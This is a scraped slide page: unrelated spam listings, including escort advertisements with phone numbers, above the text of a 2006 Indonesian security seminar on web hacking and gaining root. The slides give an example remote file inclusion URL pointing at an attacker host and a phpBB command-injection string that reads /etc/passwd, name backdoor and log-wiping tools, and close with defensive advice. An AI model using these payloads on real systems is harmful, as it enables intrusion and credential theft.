TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 

Último (20)

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 

from 33 to 0 - A journey to be root

  • 1. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Ahmad Muammar W. K http://www.google.com/search?q=y3dips
  • 2. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] theory how 2 start , lookin for foods , we “ drive in “ , what we choose, web hacking survive user, developer, administrator simulation from 33 to 0 discussion
  • 3. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] do we know hacking ? hacker != cracker hacking is not defacing f.a.q 4 newbies version 1.0 at (http://ezine.echo.or.id/ezine8/ez-r08-y3dips-faqfn.txt)
  • 4. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] footprinting , scanning , enumeration need to find a low security machine lazy admin un-patch default are fault more n more ….. pe-de-ka-te with target
  • 5. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] from open port 80 are open, 22 are open, 25 are open, … operating system vulnerability windows xp sp 1, redhat 8.0 remote ? application bug authentication attack (bruteforcing, password guessing) passive action (sniffing) social engineering
  • 6. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] well known services are open ? ssh, smtp, https, pop3 …. also open web server are open should we do web hacking
  • 7. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] hacking over http hacking against web application web browser attack using http rules (method)
  • 8. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] on the top of the layer most of server in i-net running web server how about Firewall ? it’s a legal request un-filtered ? dynamically changed run multiple application (voting, guestbook, e.t.c) more friendly >< more easier
  • 9. On The Top of Security Level Layer
  • 10. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] web browser ? (opera, firefox) command line interface (msdos, bash) programming language reference : advisories
  • 11. •Apache •IIS Plugins •Tomcat •Perl •Netscape •PHP http request •JSP (clear text/ ssl) •E.t.c Web application Http reply User (HTML, Firewall Javascript, Web Server VBscript) •MsSQL •Postgre •Mysql •Oracle Database Server
  • 12.
  • 13. Client side attack (xss, cookies stealing) Information Disclosure OS commanding (SQL, SSI, Ldap, Xpath ) Brute Force Web Hacking Denial Of Service Path travesal Remote command execution (php) Etc Sumber: http://www.webappsec.org
  • 14. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] suatu jenis serangan yang dilakukan dengan meng- include-kan halaman web lain kepada suatu situs/web aplikasi. index.php ( bug in $file variable) http://victim.com/index.php?file=readme.txt http://victim.com/index.php?file=http://echo.or.id
  • 16. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] victim http://echo.or.id
  • 17. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] <? phpinfo();?> Change url “http://echo.or.id’ > http://attacker.xxx/in.txt Real site
  • 18. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] suatu jenis serangan yang dilakukan dengan meng-include-kan tag-tag bahasa pemrograman secara remote dan mengakibatkan web yang “vulnerable” akan mengeksekusi “request” yang di kirimkan. viewtopic.php ( bug at highlight variable) http://victim.com/viewtopic.php?t=48 http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru ($HTTP_GET_VARS[a]).%2527&a=id;pwd;cat /etc/passwd
  • 19.
  • 20. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
  • 21. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] defacing private data stolen system compromise zombie ( ddos agent, botnet agent ) e.t.c
  • 22. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Kegiatan merubah/merusak tampilan suatu website baik halaman utama (index) ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (folder lain ; file lain)
  • 23.
  • 24. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
  • 25. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Ahmad Muammar W. K.
  • 26. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] always update ur system use a firewall, antivirus, good backup facility, etc using good password/pass phrase be carefull of social engineering carefully in using public facility ( cyber cafe ) secure login/Secure connection (https ; ssh) update an information
  • 27. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] secure programming input validation encryption in authentication set error log to off what u need? and what u can? update an information
  • 28. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] policy (strict restriction) optimal setting on server function restriction php (passthru , system, exec) ; mssql (xp_cmdshell, xp_regdeletekey, xp_msver); mysql (system). update the system (security pacth/update) update an information
  • 29. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Ahmad Muammar W. K.
  • 30. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] pe-de-ka-te web hacking process php injection, enumeration escalating priveledge ptrace-kmod backdooring bindtty, connect-back cleaning our footprints remove.c
  • 31. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Ahmad Muammar W. K.
  • 32. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] http://kaos.echo.or.id